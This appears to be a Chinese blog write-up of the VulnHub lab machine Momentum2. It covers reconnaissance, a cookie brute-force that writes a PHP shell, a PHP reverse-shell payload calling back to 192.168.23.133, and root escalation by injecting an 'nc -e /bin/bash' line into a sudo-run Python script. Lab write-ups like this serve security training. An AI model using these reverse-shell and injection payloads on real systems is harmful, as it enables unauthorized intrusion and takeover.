vulnhub系列:Momentum2

vulnhub系列:Momentum2

靶机下载

一、信息收集

nmap扫描C段存活

nmap 192.168.23.0/24

目标地址为192.168.23.132

01扫描IP

nmap扫描端口

nmap 192.168.23.132

发现开放端口:22、80

02端口扫描

目录扫描

python3 dirsearch.py -u http://192.168.23.132

扫描发现目录:js、manual

发现文件:ajax.php、dashboard.html、/manual/index.html

04目录扫描

扫描js目录发现main.js

04扫描js目录

拼接dashboard.html发现文件上传功能

05发现文件上传页面

尝试上传shell文件,上传失败

06上传失败

抓包尝试绕过,发现只有txt可以上传

06抓包发现txt可以上传

f12发现文件好像上传到了owls目录

06f12查看,发现txt存在了Owls目录

拼接,可以看到我们上传的txt文件

06f12查看,发现txt存在了Owls目录02

拼接main.js,发现POST请求提交到ajax.php文件

07查看js文件

拼接ajsx.php没有发现,卡在这里,搜了一下发现有.bak文件,下载ajax.php.bak备份文件,查看内容

08下载查看apk文件

文件中提到,需要输入cookie和数值val1d,cookie的最后一位是大写字母

抓包把文件中的cookie写到数据包中,并爆破最后一位大写字母

09抓包加cookie,爆破

爆破发现字母为R,响应包回显为1,成功写入shell.php

10爆破发现字母为R

看一下写入的文件

11写入php文件

二、getshell

上传反弹shell文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.133/4444 0>&1'");?>

kali开启监听

nc -lvnp 4444

image-20240814195340402

访问shell文件,成功反弹shell

image-20240814195404248

三、提权

查看当前权限,没有可利用的

sudo -l

在 /home/athena 下发现两个文件

image-20240814200938016

user.txt,发现一个flag

image-20240814200955047

password-reminder.txt,得到密码,[Asterisk]代表符号*

myvulnerableapp*

image-20240814201025999

切换到athena用户

su athena

image-20240814201217376

使用python提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

image-20240814201257238

查看当前权限

sudo -l

image-20240814201340774

可以看到 /home/team-tasks/cookie-gen.py 文件能以root权限执行,查看文件内容

image-20240814201542736

脚本接收输入的值作为seed,生成一个cookie,构造一个命令行并执行,那么在输入seed时构造反弹语句即可

kali开启监听

nc -lvnp 6666

image-20240814203543293

执行文件,输入反弹语句

sudo /usr/bin/python3 /home/team-tasks/cookie-gen.py

;nc -e /bin/bash 192.168.23.133 6666;

image-20240814203631015

成功反弹shell,提权成功

image-20240814203649094

在 /root 下发现 第二个flag

image-20240814203726472

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值